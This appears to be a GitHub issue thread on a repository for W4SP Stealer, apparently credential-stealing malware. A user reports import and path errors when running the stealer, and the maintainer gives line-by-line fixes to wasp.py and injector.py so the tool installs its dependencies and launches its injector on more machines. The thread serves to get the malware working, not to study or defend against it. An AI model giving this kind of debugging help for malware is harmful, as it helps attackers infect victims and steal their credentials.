### ISSUE TITLE
Again me

### ISSUE THREAD

**Issue by MJMODZZ-V3** [Im4wasp/W4SP-Stealer-Sourcecode#5]
```
Traceback (most recent call last):
  File "Stealer", line 46, in <module>
    from Crypto.Cipher import AES
ModuleNotFoundError: No module named 'Crypto'
```
```
'C:\Program' is not recognized as an internal or external command,
operable program or batch file.
```

2 errors i get on another pc

**Comment by Im4wasp** [comment]
wasp.py
line 42 `subprocess.Popen(f"{executable} -m pip install {modl[1]}", shell=True)`
replace it with `subprocess.Popen(f'"{executable}" -m pip install {modl[1]}', shell=True)`

injector.py
line 40 `system(f"start {executable} {path}")`
replace with `system(f'start "{executable}" "{path}"')`

this error occurs cuz some people have a weird python path (with a space in it)

**Comment by MJMODZZ-V3** [comment]
> wasp.py line 42 `subprocess.Popen(f"{executable} -m pip install {modl[1]}", shell=True)` replace it with `subprocess.Popen(f'"{executable}" -m pip install {modl[1]}', shell=True)`
> 
> injector.py line 40 `system(f"start {executable} {path}")` replace with `system(f'start "{executable}" "{path}"')`
> 
> this error occurs cuz some people have a weird python path (with a space in it)

Ah now I understand why it worked for a friend and not for me. I will just Reformat my pc
